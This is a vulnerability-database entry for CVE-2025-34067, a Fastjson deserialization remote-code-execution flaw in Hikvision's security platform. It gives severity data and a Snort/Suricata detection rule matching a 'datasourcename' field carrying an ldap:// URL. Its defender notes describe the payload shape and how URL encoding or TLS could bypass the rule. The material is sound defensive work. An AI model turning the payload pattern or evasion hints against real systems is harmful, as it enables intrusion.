cbcvebase.
CVE-2025-34067
published 2025-07-02

CVE-2025-34067: An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the…

PriorityP189critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWVulnCheck KEV
Exploited in the wild
EPSS
18.67%
96.9th percentile
An unauthenticated remote command execution vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform due to the use of a vulnerable version of the Fastjson library. The endpoint /bic/ssoService/v1/applyCT deserializes untrusted user input, allowing an attacker to trigger Fastjson's auto-type feature to load arbitrary Java classes. By referencing a malicious class via an LDAP URL, an attacker can achieve remote code execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-05 UTC.

Affected

1 ranges
VendorProductVersion rangeFixed in
hikvisionintegrated_security_management_platform

Detection & IOCsextracted from sources · hover to see the quote

url/bic/ssoService/v1/applyCT
path/bic/ssoService/v1/applyCT
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Hikvision applyCT datasourcename Parameter Command Injection Attempt (CVE-2025-34067)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:26; content:"/bic/ssoService/v1/applyCT"; fast_pattern; http.request_body; content:"|22|datasourcename|22|"; content:"|22|ldap|3a 2f 2f|"; within:15; reference:url,www.sentinelone.com/vulnerability-database/cve-2025-34067/; reference:cve,2025-34067; classtype:attempted-admin; sid:2068368; rev:1; metadata:affected_product HikVision, attack_target Networking_Equipment, tls_state plaintext, created_at 2026_03_20, cve CVE_2025_34067, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2026_03_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|22|datasourcename|22| followed by |22|ldap|3a 2f 2f| within:15
  • Look for HTTP POST requests to the exact URI /bic/ssoService/v1/applyCT (exact byte length 26) — this is the vulnerable deserialization endpoint.
  • Inspect POST request bodies for the JSON key 'datasourcename' containing an LDAP URL (ldap://) — this is the Fastjson auto-type payload pattern used to load a malicious remote class.
  • Exploitation was actively observed in the wild as early as 2025-02-05 UTC; treat any hits on this signature as high-confidence active exploitation, not just scanning.
  • Scanning/exploitation attempts against CVE-2025-34067 have been attributed to Iran-nexus threat actors using commercial VPN exit nodes (Mullvad, ProtonVPN, Surfshark, NordVPN) and VPS infrastructure — correlate source IPs against these VPN egress ranges.
  • Monitor for Hikvision Integrated Security Management Platform devices initiating unexpected outbound LDAP connections — a successful exploit will cause the server to reach out to an attacker-controlled LDAP URL to fetch a malicious Java class.
  • The Snort/Suricata rule SID 2068368 (ET, rev:1, created 2026-03-20) directly detects this exploit pattern and should be deployed at both perimeter and internal sensors.
  • ·The Snort/Suricata rule only fires on plaintext (non-TLS) traffic; if the Hikvision platform is deployed behind TLS termination or a reverse proxy, the rule will not trigger and additional inspection at the TLS termination point is required.
  • ·The URI match uses an exact byte-size constraint (bsize:26); any URL encoding, path prefix variation, or proxy rewriting of the URI could bypass this specific signature.

CVSS provenance

nvdv4.010.0CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.